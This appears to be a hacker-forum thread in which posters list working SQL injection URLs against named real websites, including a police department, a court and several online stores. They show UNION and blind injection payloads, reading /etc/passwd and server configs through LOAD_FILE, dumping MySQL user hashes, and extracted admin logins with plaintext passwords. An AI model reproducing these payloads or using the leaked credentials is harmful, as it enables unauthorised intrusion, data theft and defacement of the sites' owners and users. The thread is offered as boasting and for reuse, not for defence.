Code:
http://www.amazighworld.org/news/index_show.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15--
Database Version : 4.0.24_Debian
Database name : amazighworld_org
User name : amazighworld_org@localhost

kusa.ca PR5
Code:
http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13/*
DBVer:4.1.20
User: root@localhost << I really did not expect to see this, but never mind! =) The most interesting part is still ahead!!
DBName:desar01_cms
File reading works...
/etc/passwd
Code:
http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,LOAD_FILE('etc/passwd'),5,6,7,8,9,10,11,12,13/*
/etc/httpd/conf/httpd.conf (from this you can see that, besides the vulnerable one, there are several more sites on this server)
Code:
http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,LOAD_FILE('etc/httpd/conf/httpd.conf'),5,6,7,8,9,10,11,12,13/*
Now let's see what users there are...
Code:
http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10,11,12,13+FROM+mysql.user/*
And it turns out that root has no password at all =))) I found confirmation of this by reading the config of the local forum:
Code:
http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,LOAD_FILE('/var/www/vs/forums.kusa.ca/Settings.php'),5,6,7,8,9,10,11,12,13/*
=)

Code:
http://emap.fm/ondemandpart.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11--
Database Version : 5.0.32 - Debian
Database name : emapfm
User name : emapfm@localhost
Code:
http://www.fusionio.com/PressDetails.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,version(),database(),user()),13,14--
Database Version : 5.0.67
Database name : cms_admin
User name : root@localhost
grabbing the admin:
Code:
http://www.fusionio.com/PressDetails.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user,password),13,14+from+mysql.user+limit+0,1--
root:*31ECFA8D11EDEEB33BF4045DB0D8E5E158FD4A84 - did not crack the password

Code:
http://sterlitamak.ru/arxnews.shtml?id=-880+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10/*
version: 4.0.24_Debian-10sarge2-log
user:adminstr@localhost
database:adminstr

tatsud.ru SUPREME COURT OF THE REPUBLIC OF TATARSTAN =)))
user - tatsud@localhost
DB - BDSUD
MySQL version - 5.0.66a
P.S. My conscience did not let me dig any further =))

abbypd.ca - PR5 - ABBOTSFORD POLICE DEPARTMENT =))) calling 911 =)
MySQL Ver: 4.1.22
Code:
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(version(),1,1)))=52 -> 4 (branch)
I ran the brute force to the end and found out the exact version...
User : apd@localhost
Code:
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),1,1)))=97 -> a
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),2,1)))=112 -> p
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),3,1)))=100 -> d
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),4,1)))=64 -> @
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),5,1)))=108 -> l
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),6,1)))=111 -> o
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),7,1)))=99 -> c
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),8,1)))=97 -> a
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),9,1)))=108 -> l
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),10,1)))=104 -> h
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),11,1)))=111 -> o
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),12,1)))=115 -> s
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),13,1)))=116 -> t
DB : hh_apd
Code:
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),1,1)))=104 -> h
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),2,1)))=104 -> h
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),3,1)))=95 -> _
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),4,1)))=97 -> a
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),5,1)))=112 -> p
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),6,1)))=100 -> d
Another client... on the same hosting.. =\
tourismabbotsford.ca - PR5
Vulnerability in:
Code:
http://www.tourismabbotsford.ca/index.php?page_id=291
MySQL Ver: 4.1.22
User : tourism@localhost
DB : hh_tourism

http://www.tv.myzone.ro/index.php?mid=13[SQL]
Version :5.0.45-log
Database: avatarul_tvmyzone
User: [email protected]
blind sql...bruted

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),1,1))=102 f
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),2,1))=116 t
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),3,1))=101 e
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),4,1))=64 @
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),5,1))=49 1
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),6,1))=57 9
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),7,1))=50 2
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),8,1))=46 .
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),9,1))=49 1
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),10,1))=54 6
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),11,1))=56 8
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),12,1))=46 .
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),13,1))=49 1
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),14,1))=46 .
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),15,1))=51 3
[email protected]
***********************
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),1,1))=53 5
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),2,1))=46 .
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),3,1))=48 2
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),4,1))=46 1
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),5,1))=50 2
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),6,1))=50 2
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),7,1))=45 -
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),8,1))=68 D
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),9,1))=101 e
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),10,1))=98 b
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),11,1))=105 i
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),12,1))=97 a
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),13,1))=110 n
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),14,1))=95 _
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),15,1))=48 0
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),16,1))=117 u
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),17,1))=98 b
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),18,1))=117 u
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),19,1))=110 n
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),20,1))=116 t
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),21,1))=117 u
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),22,1))=54 6
5.2122
PS got tired of it)

http://www.bmxmagazin.ro/index.php?ref=2&categ1=-33+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7--
Database Version: 5.0.75-log
Database name: bmxmagazin_website
User name: bmxmagazin@localhost
it's getting harder and harder to find SQL injections in the .ro domain, but that only makes it more interesting for me

here you go: Contemporary Romanian Writers
Code:
http://www.romanianwriters.ro/book.php?id=-9+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())--
user(): romanian_svc@localhost
database(): romanian_svc 2
version(): 5.0.67-community

http://www.starmall.ro/magazin/?c=8&s=-34+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7
Version : 5.0.67-community
Database : starmall_db
User :starmall_star@localhost
I didn't say impossible.....

Some home-made engine (PageRank: 4, TIC: 200):
HTML:
http://absolutist.ru/admin/generation/gen.game_float.php?gid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat_ws(0x3A,user(),@@version,database()),22,23,24,25,26,27,28,29,30&pid=-1

http://www.copycomputer.ro/index.php?ref=12&id=237+UNION+SELECT+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user()),10,11,12,13,14,15--
Database Version: 5.0.67-community
Database name: copycomp_MySql
User name: copycomp@localhost
That's all for today, good night everyone.

Bookstore
Code:
http://book.xadi.net/index.php?book=-19475%20union%20select%201,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11%20--
version::4.1.22-max
user::xadinet_xadi@localhost
database::xadinet_db

Code:
http://www.godwinart.com/two.php?id=-1194+union+select+1,version(),3,4,5,6,7,8--
5.0.67-community
a little art..

Federal Radio
http://www.federalnewsradio.com/index.php/www.defenselink.mil/mtom/index.php?nid=84&sid=-1433980+union+select+1,version()/*
version::5.0.32-Debian_7etch5-log
user::[email protected]
database::tags

Code:
http://www.ps2modchip.com.br/two.php?flag=noticias&id=-6+union+select+1,version(),3,4,5/*
4.0.27-locaweb-log
Code:
http://www.parceiraagronegocios.com.br/two.php?flag=informativo&id=-2+union+select+1,version(),3--
5.0.67-community

www.pulse-of-reason.ru
The site of some rock band from Kazan)
finding the table with the admins:
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),1,1))='112 = p
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),2,1))='117 = u
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),3,1))='108 = l
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),4,1))='115 = s
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),5,1))='101 = e
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),6,1))='111 = o
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),7,1))='102 = f
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),8,1))='114 = r
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),9,1))='101 = e
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),10,1))='97 = a
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),11,1))='115 = s
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),12,1))='111 = o
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),13,1))='110 = n
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),14,1))='95 = _
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),15,1))='97 = a
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),16,1))='100 = d
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),17,1))='109 = m
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),18,1))='105 = i
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),19,1))='110 = n
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),20,1))='0
P.S. I looked up the names of the password and login columns in the source of the admin login page; very often they match)
admin login:
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+pulseofreason_admin+limit+0,1),1,1))='97 = a
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+pulseofreason_admin+limit+0,1),2,1))='100 = d
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+pulseofreason_admin+limit+0,1),3,1))='109 = m
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+pulseofreason_admin+limit+0,1),4,1))='105 = i
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+pulseofreason_admin+limit+0,1),5,1))='110 = n
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+pulseofreason_admin+limit+0,1),6,1))='0
admin password:
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FROM+pulseofreason_admin+where+login=0x61646d696e),1,1))='97 = a
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FROM+pulseofreason_admin+where+login=0x61646d696e),2,1))='100 = d
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FROM+pulseofreason_admin+where+login=0x61646d696e),3,1))='109 = m
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FROM+pulseofreason_admin+where+login=0x61646d696e),4,1))='105 = i
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FROM+pulseofreason_admin+where+login=0x61646d696e),5,1))='110 = n
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FROM+pulseofreason_admin+where+login=0x61646d696e),6,1))='0
login - password of the second admin: xernya - xernya

Office equipment store, 5th branch
Code:
http://www.05.ru/catalog.php?cid=47 union select 1,concat_ws(0x3a,admin_name,admin_pass),3,4,5,6 FROM admin_users limit 1,1 --
login:pass
azim:4z1m
Another office equipment store
Code:
http://www.ecopies.ru/showitem.php?itemid=99999+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10+FROM users+--
admin panel
Code:
http://ecopies.ru/admin/
login :: pass
admin :: ke21pud
you can make a mockery of it ))